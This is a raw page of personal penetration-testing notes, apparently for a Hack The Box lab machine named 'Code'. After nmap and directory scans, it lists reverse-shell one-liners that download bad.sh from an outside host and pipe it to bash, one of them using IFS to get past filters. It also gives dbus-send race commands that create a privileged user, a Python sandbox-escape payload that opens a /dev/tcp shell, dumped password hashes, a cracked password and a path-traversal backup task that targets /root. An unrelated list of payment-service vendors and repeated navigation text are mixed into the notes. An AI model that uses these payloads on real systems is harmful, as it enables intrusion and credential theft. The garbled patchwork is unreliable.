Enumeration

🔍 Step 1: Nmap Scan

export IP=10.129.226.249
sudo nmap -sC -sV -oA code $IP -Pn

Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
5000/tcp open  http    Gunicorn 20.0.4
|_http-server-header: gunicorn/20.0.4
|_http-title: Python Code Editor
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.92 seconds

📌 Step 2: Update `/etc/hosts`

echo "$IP code.htb" | sudo tee -a /etc/hosts

🕵️ Step 3: Directory Enumeration (feroxbuster)

feroxbuster -u http://code.htb \
  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
  -x php,html,js,txt,json,xml,bak,zip,tar,gz \
  -o feroxbuster_code.txt

🛡️ Step 4: Web Vulnerability Scanning (Nikto)

nikto -host http://code.htb -output nikto_code.txt

🚨 Step 5: Your Reverse Shell Commands (use as needed):

Command #1 (wget):

wget http://10.10.14.93/bad.sh -O /tmp/bad.sh && sh /tmp/bad.sh

Command #2 (curl with IFS):

curl${IFS}10.10.14.93/bad.sh${IFS}|${IFS}bash

When ready, simply replace <target-ip> with your actual machine IP. Let me know if you need further adjustments!

dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:lucas string:"test vulns" int32:1 & sleep 0.013s; kill $!

$6$7sDOYFq7Y8cfjez9$J2y4RzOraF0UG/Qny4Dzu7KrT6YzSkVHYd.PXEUsOgyKps3M1C5ACqQcJZ1FAkbjX1bmAzRMuho8rrRTE04zM

dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetPassword string:'$6$7sDOYFq7Y8cfjez9$J2y4RzOraF0UG/Qny4Dzu7KrT6YzSkVHYd.PXEUsOgyKps3M1C5ACqQcJZ1FAkbjX1bmAzRMuho8rrRTE04zM' string:'test vulns' & sleep 0.004s; kill $!

().__class__.__base__.__subclasses__()[317](["/bin/bash","-c","ls|bash -i >& /dev/tcp/10.10.14.93/4444 0>&1"])

[(1, 'development', '759b74ce43947f5f4c91aeddc3e5bad3'), (2, 'martin', '3de6f30c4a09c27fc71932bfc68474be')]

nafeelswordsmaster

ssh martin@$IP

cat <<EOF > task.json
{
    "destination": "/home/martin/backups/",
    "multiprocessing": true,
    "verbose_log": false,
    "directories_to_archive": [
        "/var/....//root/"
    ]
}
EOF

3de2761cc93a3826eff5fba500d8dfbc

Punch
nClouds	Infrastructure monitoring services	USA
New Relic
Airbrake

PAR® Pay Services:

Sub-Processor	Nature and Purpose of Processing	Location
Aurus, Inc.


TIG NetEnrich	Server monitoring	USA & India
TIG SecurityOnDemand	Security monitoring
Datadog

Malleum Knowledge Base

Explorer

Code

Enumeration

🔍 Step 1: Nmap Scan

📌 Step 2: Update `/etc/hosts`

🕵️ Step 3: Directory Enumeration (feroxbuster)

🛡️ Step 4: Web Vulnerability Scanning (Nikto)

🚨 Step 5: Your Reverse Shell Commands (use as needed):

PAR® Pay Services:

Graph View

Table of Contents

Malleum Knowledge Base

Explorer

Code

Enumeration

🔍 Step 1: Nmap Scan

📌 Step 2: Update /etc/hosts

🕵️ Step 3: Directory Enumeration (feroxbuster)

🛡️ Step 4: Web Vulnerability Scanning (Nikto)

🚨 Step 5: Your Reverse Shell Commands (use as needed):

PAR® Pay Services:

Graph View

Table of Contents

📌 Step 2: Update `/etc/hosts`